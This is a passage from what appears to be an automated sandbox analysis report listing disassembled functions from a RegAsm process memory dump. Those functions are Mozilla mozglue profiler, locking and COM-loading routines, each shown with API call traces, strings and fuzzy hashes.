                                                          • Part of subcall function 6C107670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C1085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C10767F
                                                          • Part of subcall function 6C107670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C1085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C107693
                                                          • Part of subcall function 6C107670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C1085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1076A7
                                                        • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1085B2
                                                          • Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
                                                          • Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
                                                          • Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                        • String ID:
                                                        • API String ID: 2666944752-0
                                                        • Opcode ID: 123f5a31dd61819f14b2774ff56f3dfe3d5629aea75686cf4c6c52313bf76de2
                                                        • Instruction ID: 8684f601099a95827e92be8de603135b142e09e0b38de4a389eda76c6cb49610
                                                        • Opcode Fuzzy Hash: 123f5a31dd61819f14b2774ff56f3dfe3d5629aea75686cf4c6c52313bf76de2
                                                        • Instruction Fuzzy Hash: DE218B743006018FEB24EB28C898A6AB7B5AF9430DF24492DE55B83B41EF31F948CB51
                                                        Function 6C0D1640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0D1699
                                                        • VerSetConditionMask.NTDLL ref: 6C0D16CB
                                                        • VerSetConditionMask.NTDLL ref: 6C0D16D7
                                                        • VerSetConditionMask.NTDLL ref: 6C0D16DE
                                                        • VerSetConditionMask.NTDLL ref: 6C0D16E5
                                                        • VerSetConditionMask.NTDLL ref: 6C0D16EC
                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0D16F9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ConditionMask$InfoVerifyVersionmemset
                                                        • String ID:
                                                        • API String ID: 375572348-0
                                                        • Opcode ID: 8c5c0699e8fa4474196e804673aaf6eb95c6743781781570159929e2018a2cb3
                                                        • Instruction ID: 5ef456996773708a2d993be6c62d9ccffdd3c4ef6c5390e726d0f36777be7fb6
                                                        • Opcode Fuzzy Hash: 8c5c0699e8fa4474196e804673aaf6eb95c6743781781570159929e2018a2cb3
                                                        • Instruction Fuzzy Hash: 9221A5B07403086FEB116B648C45FBBB3BCDF86718F458528F6459B6C1CA74AE54C6A1
                                                        Function 6C11D1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11D1EC
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D1F5
                                                          • Part of subcall function 6C11AD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C11AE20
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D211
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11D217
                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C11D226
                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11D279
                                                        • free.MOZGLUE(?), ref: 6C11D2B2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                        • String ID:
                                                        • API String ID: 3049780610-0
                                                        • Opcode ID: 6d46a073bc19bba9f4b7b2c3917fea7d600d70dc7fdfc201f48e6a774dc60bc3
                                                        • Instruction ID: a360fe8d2868acf23d0704087a4df289d192242a450d9e37b72c1717da40478a
                                                        • Opcode Fuzzy Hash: 6d46a073bc19bba9f4b7b2c3917fea7d600d70dc7fdfc201f48e6a774dc60bc3
                                                        • Instruction Fuzzy Hash: 15218071704705DFCB05EF24C488A9EB7B1FF8A328F50462DE52687740DB34A909CB96
                                                        Function 6C10F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
                                                          • Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                          • Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F619
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C10F598), ref: 6C10F621
                                                          • Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
                                                          • Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F637
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8,?,?,00000000,?,6C10F598), ref: 6C10F645
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8,?,?,00000000,?,6C10F598), ref: 6C10F663
                                                        Strings
                                                        • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C10F62A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                        • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                        • API String ID: 1579816589-753366533
                                                        • Opcode ID: a51ee48e2af0f83b454397f1823f3f6f4a53ac273a1fb95901e1d932e5dfc092
                                                        • Instruction ID: 33d30d302f2d85951f7226ff8baaa08c6521efb93eb99f0b1d67b2bf48cf2b74
                                                        • Opcode Fuzzy Hash: a51ee48e2af0f83b454397f1823f3f6f4a53ac273a1fb95901e1d932e5dfc092
                                                        • Instruction Fuzzy Hash: 1011E375301604ABCA04BF19D949EE97779FB8636CF544025EA1583F41CF31A822CBA4
                                                        Function 6C0D2070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
                                                          • Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1
                                                        • LoadLibraryW.KERNEL32(combase.dll,6C0D1C5F), ref: 6C0D20AE
                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0D20CD
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D20E1
                                                        • FreeLibrary.KERNEL32 ref: 6C0D2124
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                        • String ID: CoInitializeSecurity$combase.dll
                                                        • API String ID: 4190559335-2476802802
                                                        • Opcode ID: 6f6d386bdc7d969b43fe4228584b193baece86d7597f100cfae1e231424131b6
                                                        • Instruction ID: 6eafc26aa3344e8ad64aa2ece824bb435c473a34eba786c9f49b247de9a372a3
                                                        • Opcode Fuzzy Hash: 6f6d386bdc7d969b43fe4228584b193baece86d7597f100cfae1e231424131b6
                                                        • Instruction Fuzzy Hash: 70213976200209EBDF11EF95DC48E9A3FB6FB4A369F118024FA2496711D731A861EF60
                                                        Function 6C1099A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                          • Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C1099C1
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C1099CE
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C1099F8
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C109A05
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C109A0D
                                                          • Part of subcall function 6C109A60: GetCurrentThreadId.KERNEL32 ref: 6C109A95
                                                          • Part of subcall function 6C109A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C109A9D
                                                          • Part of subcall function 6C109A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C109ACC
                                                          • Part of subcall function 6C109A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C109BA7
                                                          • Part of subcall function 6C109A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C109BB8
                                                          • Part of subcall function 6C109A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C109BC9
                                                          • Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
                                                          • Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA
                                                        Strings
                                                        • [I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C109A15
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
                                                        • String ID: [I %d/%d] profiler_stream_json_for_this_process
                                                        • API String ID: 2359002670-141131661
                                                        • Opcode ID: 7e0c5f0bec601ec186c64e1cb254d3c6ba93cf18d46b48712903ce917de6fec8
                                                        • Instruction ID: 7229cd574d5315dcf3dee671c0f3471570b6f3323f2b62838cba4db81cd042dc
                                                        • Opcode Fuzzy Hash: 7e0c5f0bec601ec186c64e1cb254d3c6ba93cf18d46b48712903ce917de6fec8
                                                        • Instruction Fuzzy Hash: 82012635B04524DBDB007F2594397A93B78EB8232CF09C116FD1553B41CF340806D6B1
                                                        Function 6C0D1FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
                                                          • Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1
                                                        • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C0D1FDE
                                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C0D1FFD
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D2011
                                                        • FreeLibrary.KERNEL32 ref: 6C0D2059
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                        • String ID: CoCreateInstance$combase.dll
                                                        • API String ID: 4190559335-2197658831
                                                        • Opcode ID: a7e9f9dc8a574e4cac2d15adf5d4096f2660ef05944bfe5ccb7ed23ed3e1924c
                                                        • Instruction ID: f641bca5dffc1cdd46ed6c4b434050233a841dbef184da4e445658c75100e13e
                                                        • Opcode Fuzzy Hash: a7e9f9dc8a574e4cac2d15adf5d4096f2660ef05944bfe5ccb7ed23ed3e1924c
                                                        • Instruction Fuzzy Hash: 1D116A75301204EFEF10EF55C84CF5A3BB9EB8635DF10C029E92496741C731A851EEA0
                                                        Function 6C0D0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
                                                          • Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1
                                                        • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C0FD9F0,00000000), ref: 6C0D0F1D
                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C0D0F3C
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D0F50
                                                        • FreeLibrary.KERNEL32(?,6C0FD9F0,00000000), ref: 6C0D0F86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                        • String ID: CoInitializeEx$combase.dll
                                                        • API String ID: 4190559335-2063391169
                                                        • Opcode ID: f60e1607bc550afeb0dad14314ba227207637dc0508dfcb87bbec8acb01320e9
                                                        • Instruction ID: a5e5b5246dea8a0f4882b71292692b3ecbad20431cf6912c8e51d78cb8c054e0
                                                        • Opcode Fuzzy Hash: f60e1607bc550afeb0dad14314ba227207637dc0508dfcb87bbec8acb01320e9
                                                        • Instruction Fuzzy Hash: 8B11A078209350DBDF00EF59C908F4A37F4EB8A32EF52C229F92996B41D730A401DE62
                                                        Function 6C0D62E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
                                                          • Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1
                                                        • LoadLibraryW.KERNEL32(combase.dll), ref: 6C0D631B
                                                        • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6C0D633A
                                                        • __Init_thread_footer.LIBCMT ref: 6C0D634E
                                                        • FreeLibrary.KERNEL32 ref: 6C0D6376
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                        • String ID: CoUninitialize$combase.dll
                                                        • API String ID: 4190559335-3846590027
                                                        • Opcode ID: 1158eba7956d2ca80b896e38b84d32e46b0897ae91c24061bf8f1ab2942063d3
                                                        • Instruction ID: 7337624c45efaa065e830146d8d17956112c6206e1cdacb22cbe0b18327e5170
                                                        • Opcode Fuzzy Hash: 1158eba7956d2ca80b896e38b84d32e46b0897ae91c24061bf8f1ab2942063d3
                                                        • Instruction Fuzzy Hash: B50148B9609701CBEB00EF69D548B15B3F0EB0621DF11C929E921DAB81EB30A412EE51
                                                        Function 6C10F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                          • Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F559
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10F561
                                                          • Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
                                                          • Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F577
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F585
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10F5A3
                                                        Strings
                                                        • [I %d/%d] profiler_pause_sampling, xrefs: 6C10F3A8
                                                        • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C10F56A
                                                        • [I %d/%d] profiler_resume_sampling, xrefs: 6C10F499
                                                        • [I %d/%d] profiler_resume, xrefs: 6C10F239
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                        • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                        • API String ID: 2848912005-2840072211
                                                        • Opcode ID: 0ecee7cf701422e55eae16eb286285bdfb9bc1be98ea4f34a89ffaccd741c1ce
                                                        • Instruction ID: d97e4b620aeb52fd0697add4c3a81dcad95a1f90d1539c7f0c035921b44bc4a4
                                                        • Opcode Fuzzy Hash: 0ecee7cf701422e55eae16eb286285bdfb9bc1be98ea4f34a89ffaccd741c1ce
                                                        • Instruction Fuzzy Hash: D2F0BE76300604ABDA007B65A858E6E7BBCEB8A2ADF048061EA1593741DF3588029B65
                                                        Function 6C10F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
                                                          • Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
                                                          • Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F619
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C10F598), ref: 6C10F621
                                                          • Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
                                                          • Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C10F637
                                                        • AcquireSRWLockExclusive.KERNEL32(6C14F4B8,?,?,00000000,?,6C10F598), ref: 6C10F645
                                                        • ReleaseSRWLockExclusive.KERNEL32(6C14F4B8,?,?,00000000,?,6C10F598), ref: 6C10F663
                                                        Strings
                                                        • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C10F62A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                        • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                        • API String ID: 2848912005-753366533
                                                        • Opcode ID: e223d58391ad8bd4e301d9657e68244d9652a55b2474fa10609a6c1fd224567f
                                                        • Instruction ID: 12c3c83c2a5745acc83dd2a715976cfb70baab7f5e8dd4723e43c1d742c1ef7e
                                                        • Opcode Fuzzy Hash: e223d58391ad8bd4e301d9657e68244d9652a55b2474fa10609a6c1fd224567f
                                                        • Instruction Fuzzy Hash: A5F0BEB5300604ABDA007B659858E5E7B7CEBC62ADF048061EA1593741DF3548028765
                                                        Function 6C0D0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
